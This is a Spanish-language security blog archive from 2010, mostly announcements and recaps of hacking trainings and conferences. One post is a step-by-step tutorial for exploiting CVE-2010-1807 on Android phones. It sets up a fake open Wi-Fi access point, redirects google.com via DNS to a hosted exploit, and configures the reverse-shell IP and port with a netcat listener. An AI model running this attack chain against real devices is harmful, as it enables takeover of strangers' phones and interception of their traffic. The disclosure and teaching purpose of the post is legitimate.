lunes, 27 de diciembre de 2010

COMBAT Training en Chile y Colombia

Durante este verano vamos a estar dictando el popular COMBAT Training por Chile y Colombia, no te lo pierdas!


Si no sabés de que se trata el COMBAT Training podés encontrar más información aquí:
http://www.kungfoosion.com/search/label/COMBAT_Training


CHILE
- 10 al 14 de Enero

COLOMBIA

- 15 al 19 de Febrero

Para consultas podés contactarte a capacitacion@base4sec.com

Nos vemos por allí! ;-)

lunes, 20 de diciembre de 2010

COMBAT Training: Ninjas de Navidad

La semana pasada se realizó la última edición del COMBAT Training en Buenos Aires, y algunos ninjas recibieron su regalo de navidad anticipado! ;-)


Felicitaciones para Aldo Fernandez, Claudio Bazán y Sebastián Ornani quienes se llevaron la katana, la estrella ninja y los cuchillos. Fue increíble como Aldo a último minuto tomó control de todos los hosts que había owneado Claudio, felicitaciones!


Entre los asistentes de este training también tuvimos la presencia de la autora Marcelle Lefineau, que recientemente publico el libro "Tribus Urbanas - La indumentaria desde una perspectiva multicultural", y quien nos desasnó durante toda la semana sobre algunos preconceptos erróneos que teníamos sobre las tribus urbanas. Les recomiendo este libro!

Cuando dictamos el training en Buenos Aires siempre llevamos a los alumnos a almorzar a Los Leños Tango Grill, una muy buena parrilla del microcentro porteño, y esta vez no solo se sumo parte del team de BASE4, sino también el amigo @gduperre, ganador del CTF del último WiFu.


De paso aprovecho para saludar a Cristian, nuestro mozo de Los Leños, que no solo tiene una *increíble* memoria, sino que siempre nos atiende de la mejor manera :)

Nos vemos próximamente en Chile y Colombia!

jueves, 2 de diciembre de 2010

Explotando Android vía Web con airbase-ng

Recientemente se publicó una vulnerabilidad en WebKit (CVE-2010-1807), utilizado por Safari y Chrome, que también afecta al browser de los móviles con Android.


La vulnerabilidad fue descubierta por M.J. Keith, quien también publicó un exploit durante una conferencia en Houston, y luego Itzhak Avraham, realizó algunas mejoras sobre el mismo para darle un mayor grado de éxito a la explotación.

Esta vulnerabilidad afecta a móviles Android versión 2.1 e inferiores, si bien la ultima versión 2.2 no esta afectada, no todos los fabricantes de móviles u operadores de telefonía, obligan a sus usuarios a actualizar el software.

Por ejemplo, en mi caso estoy usando un Motorola Milestone con Android 2.1-update1, y si bien la versión 2.2 esta disponible hace ya un buen tiempo, Motorola recién comenzará a realizar upgrades para Milestone en Latinoamérica en el primer trimestre del 2011.

Una vergüenza por parte de fabricantes y operadores!


Explotando Android

Para explotar esta vulnerabilidad, el móvil con Android debería visitar un sitio Web que posea el código malicioso.

Podríamos hacer esto en Internet, o como lo vamos a hacer a continuación, levantar un Access Point falso para darle Internet a personas con móviles, y cuando realicen una solicitud especifica de DNS, redirigirlos a una Web local con el código malicioso.

1. Preparando el Exploit

Bajamos el exploit y lo dejamos en el home de Apache con el nombre "index.html":

nano /var/www/index.html

/etc/init.d/apache2 start


En las primeras líneas del exploit mejorado por Itzhak podemos encontrar la posibilidad de fácilmente cambiar la dirección IP y el puerto en el shellcode:


var ip = unescape("\ua8c0\u0100"); // ip = 192.168.0.1
var port = unescape("\u3930"); //port 12345 (hex(0x3039))


En este caso, una vez que la explotación sea exitosa, se va a producir una conexión reversa a la IP "192.168.0.1" en el puerto "12345", por lo que deberíamos dejar escuchando Netcat en ese puerto:

nc -l -p 12345 -n -vvv
listening on [any] 12345 ...


2. Preparando el Access Point Falso

Con lo hecho en el paso anterior, ya estaríamos en condición de atacar exitosamente a una víctima si utilizáramos una dirección IP pública en Internet.

Pero la idea a continuación, es levantar un Access Point falso con airodump-ng para que las personas con móviles se asocien a el en busca de Internet gratis, y cuando realicen un pedido DNS especifico lo reenviemos a nuestro Apache con el código malicioso.

Primero vamos a configurar Dnsmasq, quien nos va a proveer el servicio de DNS y de DHCP para nuestro Access Point falso. Si no lo tenemos instalado, lo podemos hacer de la siguiente forma:

apt-get install dnsmasq
/etc/init.d/dnsmasq stop


Luego debemos asegurarnos de configurar en que interfaz de red va a escuchar Dnsmasq, configurar el rango de direcciones IP que entregará a las víctimas, y cual será el dominio que será redireccionado a nuestros Apache con el exploit, en este caso "google.com":

nano /etc/dnsmasq.conf
interface=at0
dhcp-range=192.168.0.5,192.168.0.20,12h
address=/google.com/192.168.0.1
/etc/init.d/dnsmasq start


Si tenemos Internet, seria una buena idea forwardear todo el trafico para que la víctima crea que esta en una red Wireless común y corriente, y de paso tenemos la posibilidad de capturar algo de trafico:

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE


Finalmente levantamos el Access Point falso con airabase-ng, y configuramos la interfaz de red "at0", creada por airbase-ng, con la dirección IP a donde se realizará la conexión reversa:

airbase-ng -C 30 --essid "WIFI-FREE" wlan0  
ifconfig at0 192.168.0.1 netmask 255.255.255.0 up


En este caso, la red se llama "WIFI-FREE", aunque podríamos realizar otra variedad de ataques similares.


3. Atacando a la Víctima

Por mi experiencia con el Motorola Milestone, cuando encendemos la placa Wireless del móvil, hay que detectar las redes en el área, y conectarnos manualmente a la que queremos, mas halla de que este abierta y sin cifrado. Luego de hacer esto, la siguiente vez lo hace automáticamente.

Cuando la víctima esta conectada, el trafico de red pasara normalmente hasta que quiera ingresar a "www.google.com", en donde será redirigido a nuestro Apache y obtendremos una conexión reversa en el Netcat que dejamos escuchando:


Una vez que recibimos la conexión reversa podemos ejecutar comandos de Android como "/system/bin/id" o "/system/bin/ps" para verificar que efectivamente pudimos acceder al dispositivo.


Info relacionada:
- Exploit original por M.J. Keith
- Exploit modificado por Itzhak Avraham

Posts relacionados:
- Karmetasploit en BackTrack 4
- Jugando con AirPcap


Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

miércoles, 1 de diciembre de 2010

Se viene PampaSeg 2010!

El próximo 3 y 4 de Diciembre en la ciudad de Santa Rosa, La Pampa, tendrá lugar la 2a. edición de PampaSeg!


PampaSeg es un evento de tecnología, comunicaciones y open source, pero que hace mucho foco en la seguridad, y ya en su 2a. edición nos demuestra que ha llegado para quedarse :)

Algunas de las charlas de la conferencia son:

- Atacando WiFi II
- Man in the middle SSL
- Bacula. La Ultima Linea de Defensa
- OpenVPN
- Buenos Aires Libre
- Data Analytics en Seguridad de Gobierno y Sector Privado
- Programación para dispositivos móviles
- Una forma divertida de aprender seguridad
- Ingeniería Social
- Recoleccion de datos en Google
- Secure Software
- Introducción al lockpicking
- Fraudes en internet

Las jornadas tendrán lugar en el Auditorio del Honorable Concejo Deliberante, Av. San Martín 27, de la ciudad de Santa Rosa, La Pampa.

Si están por la zona no se lo pueden perder!

Posts relacionados:
- Primera edición de PampaSeg


Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

lunes, 29 de noviembre de 2010

Crónicas del WiFu COMBAT Training

Recientemente se celebró una nueva edición del WiFu COMBAT Training y por supuesto quedaron muchas anécdotas por contar :)


Esta vez si tuve la oportunidad de tomar el WiFu COMBAT Training dictado por Juan Pablo Borgna y me encanto! No solo pude construir una antena biquad con mis propias manos, algo impensado para alguien con tan pocos skills manuales como yo, sino que mejore mucho todo mi wireless ninjitsu ;-)

Sin mas preámbulos los dejo con la review escrita por el Sr. "Instructor" del WiFu.


Review por Juan Pablo Borgna

La semana pasada dicte por segunda vez el WiFu COMBAT Training, nuevamente fueron 3 días con el uso del procesador al 100%!

Como es la naturaleza del training, la teoría paso rápido, con lo justo y necesario, y en seguida los ninjas estaban _rompiendo_ el access point del laboratorio. Minutos después estaban rompiendo todo...

Me gusto, algo particular de este grupo, que se respetaban para inyectar los paquetes (no como otros que mantenían un constante cortocircuito en el aire, jajaja) y gracias a eso todos pudieron realizar los ejercicios rapidísimo y sin ningún problema, mientras el resto del grupo monitoreaba con el airodump. Pero claro, nada que funcione tan bien es educativo, mucho menos cuando se trata de wireless, por eso tuvimos que probar con otros "equipos de laboratorio".

Caso interesante el que encontró @gduperre, con un AP que opuso mayor resistencia. Haberlo vencido :) fue muy didáctico y educativo para todo el grupo. La clave (pero no lo único) fue cambiar la antena por la biquad hecha a mano ;)


En este curso tenían mas interés sobre la seguridad de los clientes que de la infraestructura, así que dedicamos bastante tiempo a practicar phishing, usar sniffers, realizar redirecciones de DNS y esas cosas. De repente la ip publica de facebook.com era la 10.0.0.1 ...

Como siempre salimos de paseo, esta vez camuflados de milanesas de soja para no llamar la atención.


Ya adentro, la "infraestructura" montada en pocos minutos me llena de orgullo: red cableada local a través de un switch, el GPS compartido (que primero se porto bastante mal hasta que salió andando para todos), dos portátiles con 2 placas cada una, una con una antena de cada lado...

Creo que se pudo probar todo, ya que cada uno hacia algo distinto, inyección de paquetes, rogue ap, karmetasploit, sniffers, al final el wardriving estándar lo termino haciendo un iPad que andaba por ahí...

Lógicamente, como somos todos muy responsables, no capturamos ni guardamos información privada de ningún individuo ajeno al curso, ningún tercero fue perjudicado de ninguna manera. También hay que aclarar que ningún animal fue dañado ni perjudicado durante el transcurso de este paseo. El único detalle es que @kfs acusa dolor de cabeza cuando las placas de 1000mW de potencia están transmitiendo.

 
 
Al final, la katana se la llevó @gduperre ya que logró concretar primero todos los laboratorios, aunque su antena biquad no sea las mas prolija del mundo... El segundo puesto lo empataron Leandro y Tony. Debo hacer igualmente mención especial a Lucas, quien muy calladito en su rincón estaba siempre un paso adelante.

Un análisis del curso muestra que:
- @gduperre compraba placas y antenas por mercado libre y se las hacia mandar directamente al aula
- Leandro, el electrónico del curso, hizo una antena que no andaba y se va a hacer otra en su casa (dijo...)
- Tony estaba preocupado por la seguridad de la red wireless de su trabajo (creo que no la va a prender mas…)
- A Leo le duele la cabeza cuando ve una antena muy grande
- Mi super GPS no andaba mal, era el backtrack
- El chofer de la combi del soja wardriving miraba y le parecía que estábamos haciendo algo malo (obvio que no), pero igualmente se copó con todo lo que le pedimos...

Como siempre para mi es un placer dar este training y hacerlo crecer, el objetivo a cumplir es "que sea el mejor y mas practico training de seguridad wireless", por mi parte ya tengo material nuevo para el próximo curso. ;-) 

jueves, 25 de noviembre de 2010

Primer BarCamp Security Edition en Colombia

El próximo Sábado 4 de Diciembre tendrá lugar la primer edición del BarCamp Security Edition en Colombia!


 
Los BarCamps son reuniones que nacen del deseo de las personas por compartir y aprender en un entorno abierto. Son eventos intensos con discusiones, demos y charlas en general que promueven la interacción entre los asistentes.

BarCamp Security Edition tendrá lugar el próximo Sábado 4 de Diciembre simultáneamente en las ciudades colombianas de Medellín, Pereira y Bogotá.

El programa de las charlas planeadas es por demás interesante, dentro de la lista de 25 charlas confirmadas hasta el momento, podemos encontrar:

@nonroot - "Esta difícil el asunto, que hago?, que hago?"
@xpam24 - "Uso de GPU para descifrar contraseñas"
@4v4t4r - "Cazando un pedófilo a través de internet"
@darkoperator - "Nessus & Nmap extensions for Metasploit"
@fixxx3r - "VoIP….un paraíso"
@bytemare - "Rompiendo el protocolo"
@samuraiblanco - "Los metadatos te dejan al desnudo"
@axiacamus - "Como hackear Casinos legalmente"
@ElZ00rr0 - "Legislación en Colombia"

Casualmente la semana que viene voy a estar dictando una nueva edición del COMBAT Training en Bogotá, por lo que me veré obligado a pasar a saludar a todos mis amigos colombianos por el BarCampSE ;-)

Nos vemos allí!


Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

miércoles, 17 de noviembre de 2010

Tercer Encuentro Anual de Montevideo Valley!

El próximo Sábado se realizará el tercer encuentro anual de Montevideo Valley dirigido a fortalecer la comunidad de emprendedores de IT en Uruguay.


El tercer encuentro anual de Montevideo Valley tendrá lugar el próximo Sábado 20 de noviembre, desde las 10:45 a 20:00hs, en el Auditorio del World Trade Center, en Montevideo, Uruguay.

La agenda del evento tiene charlas muy interesantes, incluyendo una mía sobre el mercado de seguridad a las 17:45 :)

Se pueden registrar gratuitamente desde aquí, y espero encontrarme con todos mis amigos rioplatenses el Sábado!

Mas info:
- Montevideo Valley
- Agenda del Evento
- Registración Gratuita al Evento



-- ACTUALIZADO DESPUÉS DEL EVENTO --

Paso el Tercer Encuentro Anual de Montevideo Valley y realmente estuvo muy bueno! Mucha gente, charlas muy interesantes, y el final con abundante cerveza :)


Quiero agradecer a Sergio Delgado y a todos los que organizan Montevideo Valley por la invitación, y por supuesto felicitarlos por el excelente trabajo! :)

Aprovecho también para saludar al amigo Alejandro Eguía de Spamloco, con el que siempre es un placer compartir un rato!

 Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

lunes, 8 de noviembre de 2010

Publicados los Videos de la ekoparty 2010!

Ya se encuentran publicados todos los vídeos de la sexta edición de la ekoparty 2010!


Hacking, an activity of public interest? - ekoparty Security Conference 6th edition from ekoparty on Vimeo.


Understanding the Win SMB NTLM weak nonce vulnerability - ekoparty Security Conference 6th edition from ekoparty on Vimeo.


Distinguishing Lockpicks: Raking vs Lifting vs Jiggling and More - ekoparty Security Conference 6th edition from ekoparty on Vimeo.


WPA Migration Mode: WEP is back to haunt you...  ekoparty Security Conference 6th edition from ekoparty on Vimeo.


Understanding the Low Fragmentation Heap: From Allocation to Exploitation from ekoparty on Vimeo.


Web Application Security Payloads - ekoparty Security Conference 6th edition from ekoparty on Vimeo.


Network-based detection of PE structural anomalies and linker characteristics - ekoparty Security Conference 6th edition from ekoparty on Vimeo.


Atacando VoIP....un paraiso - ekoparty Security Conference 6th edition from ekoparty on Vimeo.


2x1 Microsoft Bugs: 'Virtual PC hyper-hole-visor' + 'Windows Creation Vulnerability (MS10-048)' - ekoparty Security Conference 6 from ekoparty on Vimeo.


Token Kidnapping's Revenge - ekoparty Security Conference 6th edition from ekoparty on Vimeo.


Faraday: A tool to share knowledge - ekoparty Security Conference 6th edition from ekoparty on Vimeo.


SAP Backdoors: A ghost at the heart of your business - ekoparty Security Conference 6th edition from ekoparty on Vimeo.


Historias de 0days, Disclosing y otras yerbas - ekoparty Security Conference 6th edition from ekoparty on Vimeo.


Virtually Pwned: Pentesting VMware - ekoparty Security Conference 6th edition from ekoparty on Vimeo.


Pentesting Driven by FOCA - ekoparty Security Conference 6th edition from ekoparty on Vimeo.


Sandboxing based on SECCOMP for Linux kernel - ekoparty Security Conference 6th edition from ekoparty on Vimeo.


Exploiting Digital Cameras - ekoparty Security Conference 6th edition from ekoparty on Vimeo.


Wrong Way,.. a Black Hat True Story - ekoparty Security Conference 6th edition from ekoparty on Vimeo.


iPhone Rootkit? There's an App for That! - ekoparty Security Conference 6th edition from ekoparty on Vimeo.


Hanging on a ROPe - ekoparty Security Conference 6th edition from ekoparty on Vimeo.


Padding Oracles Everywhere - ekoparty Security Conference 6th edition from ekoparty on Vimeo.


Transfering files on isolated remote desktop environments - ekoparty Security Conference 6th edition from ekoparty on Vimeo.


Jackpotting Automated Teller Machines - ekoparty Security Conference 6th edition from ekoparty on Vimeo.

Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

jueves, 4 de noviembre de 2010

Open Jam 2010 - A beneficio de la "Fabrica de Inventos"

El próximo Martes 9 de Noviembre tendrá lugar la primer Open Security Jam a beneficio del hackerspace argentino "La Fabrica de Inventos".


Las Security Jam nacieron como mini-conferencias privadas, realizadas por un grupo de amigos, que tienen como objetivo compartir los últimos trabajos de investigación en el área de la seguridad informática, en un ambiente donde abunda la camaradería, la tecnología y el néctar derivado de la cebada.

Por primera, y quizás única vez, se abren las puertas de la Security Jam al público en general. El objetivo es llegar a mayor cantidad de gente posible para recaudar fondos para el hackerspace porteño "La Fabrica de Inventos".

El hackerspace "La Fabrica de Inventos", es una Asociación Civil sin fines de lucro cuyo objetivo es proporcionar un espacio físico donde se pueden desarrollar diversas actividades relacionadas con la programación, el desarrollo de hardware, la física, la química, las matemáticas, la seguridad, la robótica y el arte entre otras...

La Open Jam tendrá lugar el próximo Martes 9, de 18 a 21hs, en el Teatro La Piedad (Bartolomé Mitre 1575, CABA).

El costo de las entradas es de:
 - Entrada Común: 10$ ARS
 - Entrada Común++: 50$ ARS
 - Entrada "Grandes Colaboradores": Mas de 100$ ARS

Solamente hay lugar para 70 personas, por lo que se recomienda inscribirse rápidamente!

Mas info:
- https://sites.google.com/site/securityjam/inscribite
- http://www.hackerspace.com.ar/

Post relacionado:
- Ayuda a Crear el Primer Hacker Space de Buenos Aires


Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

martes, 2 de noviembre de 2010

Primer COMBAT Training en Ecuador!

Durante la semana pasada, tuvo lugar la primer edición del COMBAT Training en la hermosa ciudad de Guayaquil, ECUADOR!

Este post también se podría haber llamado "En Busca del Sable Perdido" o "Los Amantes del Sable", porque "Los Reyes del Sable" les quedaba muy chico… ;-)

Los Ninjas ecuatorianos, que afanosamente lucharon por poner sus manos sobre el sable son, arriba de izquierda a derecha, Antonio, Jorge, Carlos M., Peter, Paula, (yo), Jimmy P. y Jimmy J., y abajo de izquierda a derecha, Carlos A., Jose, Luis y Roberto.


Quien mas deseos tenia de irse con el sable era Jose, pero finalmente tras una durísima competencia en el CTF, el ganador fue Carlos Avila. En segundo lugar quedo Jimmy Jouvin, y en tercer lugar Carlos Montes.  


El Jueves por la noche, después del COMBAT Training, aprovechamos la oportunidad para dictar una charla para alumnos de sistemas de la prestigiosa universidad UEES. Agradezco al decano Antonio Cevallos G. por la invitación, y al profesor Carlos Montes por tan generosa presentación :)


Realmente me lleve una gran sorpresa con los amigos ecuatorianos, con los que compartimos una semana muy divertida! Me gustaría agradecer especialmente a Rubens y Roberto por hacer la magia posible ;-)


Próximamente volvemos a Colombia y luego Chile!

miércoles, 13 de octubre de 2010

Primer COMBAT Training en Panamá!

Durante la semana pasada tuvo lugar la primera edición del COMBAT Training en la Ciudad de Panamá!


Quiero saludar a los nuevos ninjas panameños con los que tuve la suerte de compartir una semana de training. De izquierda a derecha, arriba Ezequiel, Jorge y Samuel, al medio, Edgar, Angie y Damaris, y abajo, Gilberto, Heriberto, Daniel, Roberto y yo.

Creo que por segunda vez consecutiva hubo un empate en el CTF del COMBAT training, y en el primer puesto quedaron Heriberto Espinosa Cedeño y Roberto Chan Ng. Ambos decidieron realizar un sorteo y quien se llevo la katana fue Roberto!

Una postal de la hermosa Panama:


Siempre dije que dictar trainings es un trabajo duro pero alguien tiene que hacerlo… ;-)

martes, 28 de septiembre de 2010

Primera edición del WiFu COMBAT Training!

Hace solo algunas semanas tuvo lugar la primera edición del WiFu COMBAT Training dictado en Buenos Aires por Juan Pablo Borgna.


Los ganadores de esta primer edición del WiFu COMBAT Training fueron, en primer lugar Marcos M. Garcia, secundado por Roque Garrido y Diego Accorinti.


Con toda la locura de la ekoparty, no solamente deje un poco abandonado al blog, sino que tampoco pude asistir al WiFu! Por esta razón le pedí a Marcos M. Garcia, el ganador del WiFu, y quien ya había cursado el COMBAT Training previamente, que escriba una review sobre el WiFu…


        Review escrita por Marcos M. Garcia:

Como era de esperase, como en toda modalidad COMBAT Training, fueron muy divertidos los 3 días que duró el curso.

El primer día, tuvimos la mayoría de la teoría, pero @jpdborgna la manejó de tal forma que casi no nos dimos cuenta =) Nos metimos en el mundo Wireless aprendiendo sus conceptos y entendiendo la metodología de ataque. Ya que hablamos de ataque, comenzamos a meter ruido en el ambiente =P (todo sea por ganar los puntos para llevarnos los premios).


El segundo día, después de un poco de repaso, continuamos con los ataques para seguir ganando puntos. Fue cuando Diego se llevó 3 puntos porque mi blackberry se conectó, sin darme cuenta, a su AP falso...  pero por suerte no tenía cookies, ni info guardada =P.

Durante estos dias, @jpdborgna, aparte de darnos la información del curso, nos aportó parte de sus conocimientos obtenidos a través de su experiencia. Esto nos ayudó a conocer algunos TIP's para automatizar los ataques, como así también, tener una mejor performance a la hora de realizarlos.

El ultimo día fue el más esperado. Había llegado el momento de ensuciarnos las manos :) Construimos una antena biquad, a la cual había que realizarle una perforación en el medio, pero le pifié un par de centímetros jjauaaa.




La verdad que fue muy entretenido vernos trabajando con soldadores, pinzas, estaño y demás (confieso que casi pido que me saquen una foto con las herramientas para que vean que trabajé) jajaja

Luego de comer, fuimos a dar un paseo en camioneta.... obvio que para que los chicos del interior "conozcan el centro" :P



 
Por último, para la envidia de todos los que hicieron el Combat, ¡en este se anotó una chica! =)

Saludos,
Marcos M. Garcia


Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

viernes, 24 de septiembre de 2010

Estadísticas de la ekoparty

Paso la sexta edición de la ekoparty! y como todos los años fue un evento increíble, pero sin dudas esta edición será recordada por el increíble  crecimiento que tuvo, y también por alguna que otra polémica… ;)

Como me cuesta mucho ser objetivo, voy a hacer mi resumen del evento con "números", que de todas formas son interesantes de conocer.

Lo que mas nos sorprendió a todos, es la gran cantidad de personas que asistieron, mientras el año pasado se veían algunos espacios vacíos en el auditorio, este año estaba completamente lleno y con mucha gente parada en el fondo.

El número oficial para el 2010 es de aproximadamente 850 personas! INCREIBLE :)

 
Muchos de los Speakers también sorprendidos por la gran cantidad de asistentes, nos comentaban que veían a la ekoparty mucho mas grande que BlackHat Europe y BlackHat Japon. (Si alguien tiene números de estas y otras conferencias se los voy a agradecer)

Pero la ekoparty no solo creció en la cantidad de asistentes, sino también en el contenido, que es el corazón del evento. Este año tuvimos 24 charlas! y fue una de las razones por las que nos costo tanto ajustarnos a los tiempos del cronograma.


Por supuesto que tantas charlas vienen acompañadas de una gran cantidad de Speakers, que vinieron de todo el mundo para presentar sus ultimas investigaciones.

 
El contenido de las charlas fueron de un nivel altísimo, que no tiene absolutamente nada que envidiarle a cualquier conferencia del mundo. Tuvimos las mejores charlas de Las Vegas, y hasta algún research publicado por primera vez en la ekoparty ;-)

Para el año que viene no se que vamos a inventar porque esto parece insuperable… Mil gracias a todos los amigos que constantemente nos apoyan para que podamos seguir creciendo con este evento que es para todos!


Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

sábado, 11 de septiembre de 2010

Durante la ekoparty... Seguime en Twitter!

Durante toda la semana de la ekoparty, me podes seguir en la siguiente dirección de Twitter: @kfs

Nos vemos la semana que viene!


Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

miércoles, 8 de septiembre de 2010

El Atacante Informático – Capítulo 4

Ya se encuentra disponible un nuevo capítulo del libro "El Atacante Informático" de Jhon César Arango.

Este libro digital, es de distribución gratuita, y en cada capítulo que es liberado nos introduce en una nueva temática. En esta cuarta entrega, podemos encontrar todo lo relacionado a "Enumeración y Reconocimiento".


Sin dudas es un valioso material de consulta para todos los que trabajamos en seguridad, mis felicitaciones para Jhon!! :)

- Descargar los capítulos 1 - 3
- Descargar el capítulo 4


Desde ya agradezco también, la mención que se hace de mi persona en la dedicatoria de este nuevo capítulo :)

Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

martes, 31 de agosto de 2010

Participa del Challenge de ESET en la ekoparty!

ESET, uno de los Sponsors de la ekoparty, lanzo un desafío con el cual te podés ganar una vacante gratuita para el training "Modern Malware Reverse Engineering" dictado por Joan Calvet, que tendrá lugar durante la semana de trainings de la ekoparty.

El Challenge de ESET es un desafío del tipo crackme con varios niveles, y a mayor puntaje obtenido mayores posibilidades de ganarte la vacante gratuita para el training.

Podés encontrar las instrucciones y toda la información necesaria para participar del desafío aquí:


Todo el material requerido debe enviarse en una carpeta comprimida en formato .RAR a: desafioeset@eset-la.com indicando nombre completo y teléfono de contacto para que ESET te pueda avisar en caso de que seas el ganador.

lunes, 30 de agosto de 2010

23 Charlas Confirmadas Para la Ekoparty 2010

Ya se encuentra disponible, el listado de las 23 charlas seleccionadas para ser presentadas en la sexta edición de la ekoparty Security Conference. Y SI! Aunque no lo crean, son 23 charlas! Mas alguna otra sorpresa... ;-)


Dentro de muy poco tiempo, este escenario vació se llenará con una gran cantidad de oradores de todas partes del mundo. Las 23 charlas seleccionadas fueron las siguientes:

- Chema Alonso - Pentesting Driven by FOCA
- Cedric Blancher - Hacking, an activity of Public interest?
- Nicolas Bareli - Sandboxing based on SECCOM for Linux kernel
- Cesar Cerrudo - Token Kidnapping\'s Revenge
- Cesar Cerrudo - History 0days, Disclosing y otras yerbas
- Claudio Criscione - Virtually Pwned: Pentesting VMware
- Giovanni Cruz  - Atacking VoIP…a paradise!
- Nicolas Economou - 2x1 Microsoft Bugs: 'Virtual PC hyper-hole-visor' + 'Windows Creation Vulnerability (MS10-048)'
- Gary Golomb - Network-based detection of PE structural anomalies and linker characteristics
- Michael Hudson - Wrong Way, the true story of a Black Hat
- Barnaby Jack - Jackpotting Automated Teller Machines
- Leando Meiners & Diego Sor - WPA Migration Mode: WEP is back to haunt you...
- Eric Monti - iPhone Rootkit? There's an App for That!
- Mariano Nuñez Di Croce - SAP Backdoors: A ghost at the heart of your business
- Hernan Ochoa - Understanding the Win SMB NTLM Weak Nonce Vulnerability
- Hernan Ochoa -Transferring files on isolated remote desktop environments
- Deviant Ollam - Distinguishing Lockpicks: Raking vs Lifting vs Jiggling and More
- Alfredo Ortega & Oren Isacson - Exploiting Digital Cameras
- Andres Riancho - Lucas Apa Web Application Security Payloads
- Juliano Rizzo & Thai Duong - Padding Oracles Everywhere
- Pablo Sole - Hanging on a ROPe
- Roelf Temmingh - Your life online: No more secrets Marty
- Chris Valasek - Understanding the Low Fragmentation Heap: From Allocation to Exploitation

La ekoparty también quiere agradecer al comité de selección, el cual tuvo la difícil tarea de evaluar el nivel técnico de cada una de las presentaciones. El comité de este año estuvo conformado por:

- Cesar Cerrudo (Argeniss)
- Sebastian "topo" Muñiz (Independent Security Researcher)
- Gera Richarte (CORE)
- Juliano Rizzo (Netifera)
- Nicolas Waisman (Immunity)

No se pierdan la oportunidad de asistir a una conferencia única en su estilo! Es solamente una vez al año! ;-)

Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

sábado, 21 de agosto de 2010

Más Trainings en la ekoparty!

Como 10 trainings nos parecían poco, ahora ya tenemos 11! Logrando reunir en la ekoparty los mejores y más innovadores trainings en Latinoamérica.

El 11o. training es presentado por Core Security y se titula "Introducción al Cracking y Anti-Cracking".


La ekoparty es solo una vez al año, no pierdas la oportunidad! :)

miércoles, 18 de agosto de 2010

Ganador del Sorteo del WiFu COMBAT Training

Ya tenemos al ganador del sorteo de una vacante gratuita para el WiFu COMBAT Training! El training de wireless hacking avanzado que tendrá lugar el 24, 25 y 26 de Agosto en Buenos Aires.


Para mayor información sobre el WiFu COMBAT Training contactate con Sol Argento: sargento@base4sec.com

domingo, 15 de agosto de 2010

Kung-FOO de la Semana #005

Esta última semana me encontré con varios artículos relacionados al hacking de hardware, ¿una moda pasajera? o ¿ya nos cansamos de tanto buffer overflow? :P


A continuación 3 excelentes artículos! 


topo le rompe el decodificador a Cristina

El amigo Sebastian Muñiz, también conocido como "topo", hackeo el decodificador (Set Top Box CDR1000D from Coradir) que regala el gobierno para promover la Televisión Digital en Argentina.



Leer el artículo completo aquí.


Cuidado! nonroot is Watching You...

El amigo Fernando Quintero, también conocido como "nonroot", descubrió una forma de tomar control de una Cámara IP (ACTI ACM-4000) y puede observar todo lo que estas haciendo!



Leer el artículo completo aquí.


Hackean el computar de a bordo de automóviles

Una investigación de universidades norteamericanas logró demostrar que es posible hackear el computados de a bordo de un automóvil, dándole a los atacantes la posibilidad de tocar la bocina, cortar los frenos, etc.  


Leer el artículo completo aquí.


Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

jueves, 12 de agosto de 2010

Los Mejores Trainings de Latinoamérica están en la ekoparty!

Ya se encuentra abierta la inscripción para los trainings y la conferencia de la edición 2010 de la ekoparty!


Nuevamente la ekoparty Security Conference reúne en Buenos Aires los mejores trainings de Latinoamérica, con instructores provenientes de todas partes del mundo y a un costo accesible para todos.

Deviant Ollam enseñando como abrir esposas y cerraduras en el 2009

Los 10 trainings seleccionados para esta edición son:



3. Python for hackers, por Sebastián Fernandez y Matías Soler

4. Breaking Windows, por Agustín Gianni y Franco Riccobaldi


6. SAP Security In-Depth, por Mariano Nuñez di Croze

7. Web Testing & Exploiting Workshop, por Andrés Riancho y Nahuel Grisolía

8. CRACKING WIFI - for real, por Cedric Blancher

9. Hacking y Seguridad en VOIP, por Giovanni Cruz Forero


Una de las razones que hace a la ekoparty tan especial, a diferencia de otras conferencias similares, es que se hace mucho foco en el social networking, y por supuesto los trainings no son la excepción!

Todos los alumnos tienen la posibilidad de interactuar con sus pares y con los instructores de los otros trainings, ya sea en los coffee breaks, los almuerzos que organiza la ekoparty para los alumnos o en la fiesta de cierre de los entrenamientos, exclusiva para instructores y alumnos.

La conferencia es el 16 y 17 de Septiembre, pero la ekoparty ya se empieza a vivir el 13, 14 y 15 con los trainings, no te lo pierdas!


Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

sábado, 7 de agosto de 2010

Los Angeles de Charlie

Paso una nueva edición del COMBAT Training en Buenos Aires y ya falta muy poco para que llegue la primera edición del WiFu COMBAT Training!

De izquierda a derecha, Guillermo, Jorge, (yo), Ignacio, Juan Pablo, Alan, Matías y Jerónimo. Falto Juan Manuel en la foto. Podemos ver a todos con la camiseta oficial del training,  esta de mas decir que un verdadero Ninja solo tiene una cosa que decirle a sus enemigos: "GO HACK YOURSELF!" :P


A diferencia de otras ediciones del COMBAT training, en donde desde el día 1 algunos asistentes llegan con el objetivo de ganar el CTF, esta edición se desarrolló con gran tranquilidad, hasta que llegó el Viernes...

El Viernes por la tarde, durante el CTF, se podía sentir la tensión en el aire, y durante las pocas horas que duró esta competencia, que tiene como objetivo poner en práctica todo lo aprendido durante la semana, la adrenalina llego al máximo! :)

El ganador del CTF de esta edición, fue Matías Golini, en segundo lugar Guillermo Pedraza y en tercero Alan Villaverde.

Felicitaciones a los ganadores! aunque en la foto, más que Ninjas, parecen "Los Angeles de Charlie" :P


El Viernes por la mañana, llegamos al módulo de Wireless Hacking, que en esta ocasión fue dictado por Juan Pablo Borgna, el instructor oficial del WiFu COMBAT Training. Podemos ver a Juampi preparado para la batalla! :P


La primera edición del WiFu COMBAT Training tendrá lugar el próximo 24, 25 y 26 de Agosto, y ya quedan pocas vacantes. No se olviden de participar del concurso para ganarse una vacante gratuita para este training!


